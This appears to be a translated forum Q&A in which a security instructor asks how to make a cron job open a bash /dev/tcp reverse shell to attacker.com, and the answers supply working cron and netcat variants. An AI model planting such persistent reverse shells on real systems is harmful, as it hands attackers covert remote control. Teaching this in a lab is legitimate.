4

我在一所大学教网络安全,正在编写一个关于 Netcat 和反向 shell 的实验室。我创建了一个运行连接到我的侦听器的脚本的 cron 作业。这很好用。问题是指纹太多,脚本可以被删除。实验室的一部分是关于隐身操作(比如在输入的任何命令前放置一个空格)。

我正在尝试执行此命令。现在频率并不重要,但最终它会在启动时每 30 分钟运行一次。

/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

从命令行运行时,该命令起作用并建立了反向 shell。我不想使用端口 80,因为如果学生决定尝试一些愚蠢的事情,我确实希望它被阻止下一个实验室也在 iptables 上阻止这个端口。

我试过引号。我试过sudo。末尾的双 & 号。末尾有一个 & 符号。/tcp/ 路径的进一步限定。我认为我不需要确定它是从哪个 tty 会话运行的(那会很困难)。在任何情况下 cron-run 命令都不会成功。

crontab -l

# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

这是系统日志

cat /var/log/syslog 

Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)

它似乎没有失败......它只是不工作。

所以对于许多比我聪明的人来说,我做错了什么以及如何让这个命令作为一个 cron 作业工作(调用脚本不是一个选项)?

更新:解决方案是* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'虽然我仍在努力解决两个错误。

4

2 回答 2

6

/dev/tcp基础主义

请注意,这/dev/tcp/host/port是一个bashism

cron不会理解他们的!

你可以试试:

* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'

或使用非 bash 方式:

用于netcat示例:

* * * * * /usr/bin/nc -c /bin/bash\ -i attacker.com 5326 0>&1

(见man nc.traditional对比man nc.openbsd

于 2019-03-19T12:52:28.310 回答
1

我怀疑您从命令行传递的 argv 数组中的内容与来自 cron 守护程序的数组中的内容不匹配。虽然我不知道丢失的逃逸是什么,但这里有一个诊断它的一般方法:

void main(int argc, char **argv) {
  for( int i=0; i<argc; i++) 
    printf("%d: '%s'\n",i,argv[i])
}

如果您将其编译成二进制文件并在这两种情况下使用您的 args 运行它,您应该会看到不同之处:

./a.out -i >& /dev/tcp/attacker.com/5326 0>&1

相对:

* * * * * /path/a.out -i >& /dev/tcp/attacker.com/5326 0>&1

如果不是 argv 的差异,命令行 bash 进程(>&0>&1不是正在启动的进程)是否会处理 and 并应用于正在运行的 bash shell,以便攻击者二进制文件没有重定向,但它的父进程过程呢?

编辑:

F. Hauri 提出了一个很好的观点,但你可能想要在你的 crotab 中是:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'

(或者他们可以编辑他们的答案,/path/a.out 部分是错误的)

Edit2 - 捕获输出:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1 >/path/to/logfile'
于 2019-03-19T12:46:22.477 回答